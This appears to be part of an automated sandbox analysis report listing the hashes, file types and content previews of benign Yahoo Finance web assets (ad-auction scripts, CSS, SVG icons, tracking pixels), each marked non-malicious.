                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:0p39ZVc+wFdREZm+9OB/ZexHNbLWBtiHqIur0JARNS15YO4j:0FSbCELB/UvfaF3ayA15YVj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:274C92C9F0F25B3BA07BB295416DE201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5CFF9E9E55A1141731A81DCAED2C2CCE7F50F9F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:20BA420D179B3C58057E9100CDAC6B3805CA5E54BA6906A74582385711CB1526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3C61ACBF37383C0CC86070FE00B7371B4EEC1ABB9ADE0878D15EB1CD5E88BB7B49B3640ACBC2A6EAFAEBE33CE518116235119054D398DB7050498783AB1EE883
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://gps-aa.ybp.yahoo.com/bid/yoo/adslot/13885/?pa=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!doctype html>.<html lang="en">.<body>. <script>. (() => {. const run = () => {.. const origin = "https://pa.ybp.yahoo.com";. const interestGroups = [{. name: "3382786",. owner: `${origin}`,. userBiddingSignals: {},. trustedBiddingSignalsUrl: `${origin}/v1/getvalues`,. trustedBiddingSignalsKeys: ['3382786'],. biddingLogicUrl: `${origin}/opus/tag/gps/bidding-logic.js`,. ads: [{. renderUrl: "https://pr.ybp.yahoo.com/pr/secure/true/adid/Oda4BMr04dyukQhb4nknPg/pa/1",. allowedReportingOrigins: ["https://pn.ybp.yahoo.com"],. metadata: {. width: 300,. height: 250,. crid: 7354383,. adomain: ["yahoo.com"],. seat: "47",. ad: 15960441,. line: 3382786. }. }]. }];.. const expiryInSec =
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (14735)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):14736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.279493144492736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:F5aZuuCZiezH7ljfWEvlvqIZhwi0LPKd2ZrW9HfCOac6LEeNpwhEtySQH:F5aZuuCZTzJDnvlvqWwFLPKcZifCOacx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E46DC263A971359A2B38E23A9B10D8BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EC70E39601BB108B806085AE9A331484F4391A50
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C7389535EF36198F9C1F986D8A1B0BB3E8A7174225DD6F861CE4EA0782323D88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B0B3B3C784ADAB1B1842D1FFE07569D9282EFFF58EEB6E3088B651A145B2F4B1B8BB92FE43CEBB141F65585C057B712B652A8F087972D6D2AE0805A00593E307
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const G=Math.min,_=Math.max,tt=Math.round,N=t=>({x:t,y:t}),Dt={left:"right",right:"left",bottom:"top",top:"bottom"},kt={start:"end",end:"start"};function ct(t,e,o){return _(t,G(e,o))}function Q(t,e){return typeof t=="function"?t(e):t}function M(t){return t.split("-")[0]}function U(t){return t.split("-")[1]}function vt(t){return t==="x"?"y":"x"}function dt(t){return t==="y"?"height":"width"}function X(t){return["top","bottom"].includes(M(t))?"y":"x"}function mt(t){return vt(X(t))}function Nt(t,e,o){o===void 0&&(o=!1);const n=U(t),i=mt(t),r=dt(i);let s=i==="x"?n===(o?"end":"start")?"right":"left":n==="start"?"bottom":"top";return e.reference[r]>e.floating[r]&&(s=et(s)),[s,et(s)]}function Ft(t){const e=et(t);return[lt(t),e,lt(e)]}function lt(t){return t.replace(/start|end/g,e=>kt[e])}function Vt(t,e,o){const n=["left","right"],i=["right","left"],r=["top","bottom"],s=["bottom","top"];switch(t){case"top":case"bottom":return o?e?i:n:e?n:i;case"left":case"right":return e?r:s;default:return[]}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1760)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1761
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.209769182472249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:RUAOqJDh2TCbRM4wn1fhPB9WieXIpW/tigBeJgnpNF6s5:SAXJDhXM1fIie40liy1p6s5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CCC8E8622D9B302E99027D98B5ED6442
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C1005DA8DE172CAB3861617CCBEC0D0B5E446CF3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F9D7D167400955D50562C84BA9DB06FBE0E6946BC69D21CDB02A13764F44BA62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B76577A44256D3E63A7DCC0E7575D356E9B04C6D4D1BDA67B82D850738DDFD81B4846E4380AF9E863E70434F7E55E633903A97F8D978561350F34449AF07F1D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var l=(r=>(r.DESTROYED="nimbus:ad-destroyed",r.AD_CONTROLLER_READY="nimbus:ad-controller-ready",r))(l||{});function m(r){return new CustomEvent("nimbus:ad-destroyed",{detail:r})}function S(r){return new CustomEvent("nimbus:ad-controller-ready",{detail:r})}function y(r,n){return r.replace(/{{(.*?)}}/g,(e,t)=>n[t]!=null?n[t].toString():e)}function b(r,n={}){return Object.entries(r).reduce((e,[t,i])=>{if(i)if("path"in i){const a=y(i.path,n);e[t]={...i,path:a}}else e[t]=i;return e},{})}function f(r){return Array.isArray(r)&&r.length===2&&typeof r[0]=="number"&&typeof r[1]=="number"}function s(r,n=","){return Array.isArray(r)?f(r)?r.join("x"):r.map(e=>Array.isArray(e)?e.join("x"):e.toString()).join(n):r??""}function c(r,{width:n}){return r[0]<=n}function g(r,n){if(!Array.isArray(r))return r;if(f(r))return c(r,n)?r:void 0;const e=r.filter(t=>!f(t)||c(t,n));return e.length?e:void 0}const d=10;function h(r){if(Array.isArray(r)){if(f(r)){const[n,e]=r;return e<d?void 0:e}for(const n of r){if(!f(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):122423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.305665849799451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:r4g3D3Aeq/dcMxv4IczaOil5dHpTGQHamSWiEmP72jdHrN42WdO7deK5YECDPE5C:y2D7udLN42WdO7deKw60jAeYv70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3A4F4E3C76D33DF0A92E9A17A63CDAC8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:755F6A7E77EF1B8B55AEE721C48CD6334CB234ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:52E478E6F162478B00EA3B66FD68FAF5E66F4F0EB6A36A27D22DF0532E2B0D05
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:672D4ED88E5B4B921EA287AF9C13175952AC0F8252D6C55009F976AAC4791EDACF7C19B92FCA401C71F747C8985FDBA3E303DFF9B490E8990F700486BC201406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/c/755f6a7.caas-news_web.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("CAAS",[],t):"object"==typeof exports?exports.CAAS=t():e.CAAS=t()}(self,(function(){return function(){var e,t,s,o,a={"./node_modules/@vzmi/caas-static/src/lazy/js/index.js":function(e,t,s){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s("./node_modules/@vzmi/caas-static/src/util/js/index.js");const a="loading"in HTMLImageElement.prototype,i="data-caas-lazy-loading-init";let n,l;function r(e,t){return e.nodeName.toLowerCase()===t}function d(e,t){const s=e._util,{pendingClass:a}=e.options;return()=>{if((0,o.elementInView)(t,e.options,s._viewport)){const o=s.elements.indexOf(t);e.load(t),s.elements.splice(o,1),s.count--,0===s.count&&e.destroy()}(0,o.removeClass)(t,a)}}function c(e){const t=e._util,{pendingClass:s,successClass:i,timeout:n}=e.options;for(let l=0;l<t.count;l++){const c=t.elements[l],m=a&&r(c,"img"),u=!m&&(0,o.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1030)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1031
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.252415287435821
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:GvcMnL+dnRRBaWR3RAtIs6QDya3LtcHa/KN73vcqV5OisyTwDJ5:GvjCdnRRBaWhkT3xzCN7RVQ7UwDJ5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:68B09977263AEAE9E7E4AC9A32ED2655
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1AD5E5DF08709D667C5802F7365066C2F7BB7E85
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:26DF2BD601F6609877141D1D0B2E279156644A2392601F62D70D593E59DD6793
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C7D5F014285BC113FA43ECE7BEDAC650BB8CFF20B86448583A2CD7F13C52D3C72B9A357B3AB97A355DAFC6AEFF041B25D8BFCBE1BF0EE7CCF6AC949EC29583E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{c as T,d as k}from"./commonUtil.BWwawKjd.js";import{f as m,l as h}from"./logUtil.CCV3qKPL.js";async function w(i,{count:a=25,silent:n=!1,quoteType:o="ALL",force:t=!1,critical:l=!1,fields:u=[]}){var f,c;const[e]=await T(["trendingTickers"],i),g=await k(i);if(e.getTrendingTickers().length>=a&&!t)return e.getTrendingTickers();try{const r=await m(i,{pathname:`/v1/finance/trending/${(g==null?void 0:g.region)||"US"}`,perfLabel:"loadTrendingTickers",query:{count:typeof a=="number"?String(a):a,fields:["logoUrl","longName","shortName","regularMarketChange","regularMarketChangePercent","regularMarketPrice",...u].join(","),format:"true",useQuotes:"true",quoteType:o}}),{result:s,error:d}=(r==null?void 0:r.finance)||{};return d||!s?(e.setError(d),null):(n||e.updateTrendingTickers((f=s[0])==null?void 0:f.quotes),n||t?(c=s[0])==null?void 0:c.quotes:e.getTrendingTickers())}catch(r){if(h(i,{count:a,silent:n,force:t,quoteType:o},{data:r,perfLabel:"loadTrendingTickers",isCritical:l}),n||e.setError
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):161
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.139728931781201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:M/sqDmJS4RKb5ykKcvXjXRHoNcHCUOFUOGLFUUvXALLGQkHgwdIF8IAdSfFED:+9mc4sl3O4XWMvXA3kHgwKFSZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6D2EAE957630F2A5473DCF80198ECE6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2CEABA184D273AF24CF40F5AF121FB44E4DA9014
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B74434EE99707AD7DF004D009EB9F45DA79EB0FA8010B15557EC7D9FC550D3A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:946DC490B794374A75D318383FD86A900D61DFB20A14B14F8FD274428721209F8746CB84CA2415CAE4D06C1E1AFEA26A07F0602462BAE23F9961FB8DAAD167B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const w='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m12 4-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8z"/></svg>';export{w as A};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, was "346-bundle.js", last modified: Thu Jun 27 09:13:17 2024, from Unix, original size modulo 2^32 227170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):69610
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.9966343457380855
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:YTyh0gRi8+wHSCFYlitbzM6n9+RlSJncyzdTJZ2h:YC0DnC4itfM69+LsncyJTJZq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8CA6773E4B91A06604692708D201E8F4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4D759809042CBC6E1D55C48CB196C3E242F7146E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9A8419EB7B01EB498CF4E369AEE21BDDB3723963C6AF7B4E7623DBFD5C55399D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A6F3702415409A155F0B1362347447857CFF469D61B1EAB1203F76DD562D61C9B8DE8D22DDD208FD6274B7831E1DB75C70963D7B30C3593165A3C789DCE5AA68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:....--}f..346-bundle.js..;ks.H....M.K...o.w(O..xob...n...K@..E..l.....t.^ '..{k.jB........z.c(j.?b<b5.OB1.b?.E.<................._\.]..s\{.._f.....o..~....h....>..>.1A.;...Z.".ff....d.9==m;&#1..}.2..&..(6.......$.r[..E.=6c...So..._...8 .Y.A..p....w1|FrTl....1.$..t...Z..tn....?.....m..`..&.V..t}..../....0....../.....d...'.'.....2.]...=.onn..vA.......x.....V{..\.X........9.G..9T..a|.t..B5....:..........[.Bv...(B.".....[.....`.h....i...G...a..1W}.$....9.=.l.:J......9....R..N).I....-...).lB.O...8.j.m(}..L...$fB-..iw..~..b.:.b.:....[.....}=.^>...]j..p..)%.......,.E{0.}.A.........}..q.v.j(.pA....<.ec.........Lbk....!....[..M<..c......a.....F..&.%........H.So.).....5..n.$X..^.{...0.ke.......#/......w.......m.....?Y#.....&DH.y.9n.X.....a..B.x-.f.p....t.G......%.e>....V.$....fu.j.J.:.vI.y<[fh.z.>.O...P0...'.....H...d4.`.av..Z*.F.W...c..1....e. ....~....,.....g_.!.......<....W.+%&.<=j..[..n........uJa....S.a.M.R.5.......r....0....ev.....\...wN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1176)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1177
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.975780216942456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:c45pAMuhiDoVXng57I+C4IgvCQC8Ui562gqGAz5eRn:cWv0fZg5UmKlf3vqG7Rn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C15DD69D7577D47739EFE0693FB9742C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EB4470BD91D7909A8512FFADC38CADDBA408290B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AF5CB8BA572866A383546642AE22499CAE9D309FF33E549AB9834370751C13BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:329C5773EDCBB54905609979291E9B5E069C7DC6EBD08F10F6AFEB81437AC27649026C683BC8C0ECA4A6E5C6EF2B724B800C0508A74EC94E1D596FFDB344CC34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/SkeletonLoader.YZvit63q.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.loader.yf-10mmfrb{position:relative;width:100%;height:100%;opacity:.6;background-color:var(--separator);border-radius:var(--border-radius-m);overflow:hidden}.loader.yf-10mmfrb:after{position:absolute;top:0;right:0;bottom:0;left:0;transform:translate(-100%);animation:yf-10mmfrb-skeleton-loading 1s linear infinite alternate;will-change:transform;background-image:linear-gradient(90deg,#fff0 0,#fff3 20%,#ffffff80 60%,#fff0);content:""}@keyframes yf-10mmfrb-skeleton-loading{to{transform:translate(100%)}}.loader.text.yf-10mmfrb{height:1rem;margin-bottom:var(--space-1)}.loader.text.yf-10mmfrb:last-child{width:80%;margin-bottom:0}.loader.price.yf-10mmfrb{height:1rem;min-width:4ch}.loader.price.yf-10mmfrb:last-child{width:80%;margin-bottom:0}.loader.card.yf-10mmfrb{height:3rem;margin-bottom:var(--space-3);border-radius:var(--border-radius-none)}.loader.card.yf-10mmfrb:last-child{height:2rem;margin-bottom:0}.loader.storyImg.yf-10mmfrb{width:100%;padding-bottom:77.77%;height:unset;margin-bottom:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.748805071873871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHXDFhCTL6lRcoFU6uSvHBXheF/cazTPH8KFAh:H69mc4sl3O4zDQL6Akd/Bg+fb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:14EA00F1960955017A2D326CE7DD4901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9E6218631E95A6197E972A28CFF3F6CF12996DBE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0D1B099D5A0C41A08AF16526735EA6A3C14FF505892302D1D5588A9FED26CEFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AE2CDC29D7B7E03D9245858B251BC1E8F13E0D38B4A664B45F36E1A82DF74D6624E9BDAA749D2C8F40D8E892E0F2EBBECEA9CA915D28C53D34FB87FCC2178D21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/close.C3ug6nNR.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>';export{s as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2101)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.869261289005738
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:BLtAi6vR8StmMe0fPMdVLB/hqgtdgowvekIj:BLtAi658SUMe0fPMdzb9wWzj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:319E6D40D27E5ED5627DE1EA6EB2A52D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BA91A8A7305DC2856546FD08D707BFC19DB8759C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6DF070481FB2EE4566FC9D81976634A4CEE33502046FA4ECB6DEFC712638AE20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:36747FD7633FC19C927E710774719BEB483CA22149D2167E3F64759ABE76137EA681FED88DAA8386ADDA5D901A3246467C4400E519E238864E0C9952B996361D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Card.CXxu1kiL.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.card.yf-xvi0tx.yf-xvi0tx{--card-spacing:var(--custom-spacing, var(--space-2));background-color:var(--surface2);border-radius:var(--border-radius-m);position:relative;gap:var(--custom-gap-spacing, var(--card-spacing));padding:var(--card-spacing);display:flex;flex-direction:column}.card.sticky.yf-xvi0tx.yf-xvi0tx{scroll-snap-align:start}.card.bdr.yf-xvi0tx.yf-xvi0tx,.card.yf-xvi0tx .card-link.bdr.yf-xvi0tx,.card.yf-xvi0tx .card-btn.bdr.yf-xvi0tx{border:1px solid var(--separator)}.card.yf-xvi0tx .card-link.yf-xvi0tx,.card.yf-xvi0tx .card-btn.yf-xvi0tx{cursor:pointer;position:absolute;top:0;left:0;width:100%;height:100%;content:"";border-radius:inherit;border:1px solid transparent}.card.yf-xvi0tx .card-link.yf-xvi0tx:hover,.card.yf-xvi0tx .card-link.yf-xvi0tx:focus,.card.yf-xvi0tx .card-btn.yf-xvi0tx:hover,.card.yf-xvi0tx .card-btn.yf-xvi0tx:focus{box-shadow:var(--shadow1)}.card.yf-xvi0tx .card-link.yf-xvi0tx:disabled,.card.yf-xvi0tx .card-btn.yf-xvi0tx:disabled{cursor:auto;box-shadow:non
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):270
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.881247785412739
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:H69mc4sl3O48MV4Gunk1r2UVJrLxIIcIdWR74dGwn:a1P8Mnunk1rDJIfIdWRsb
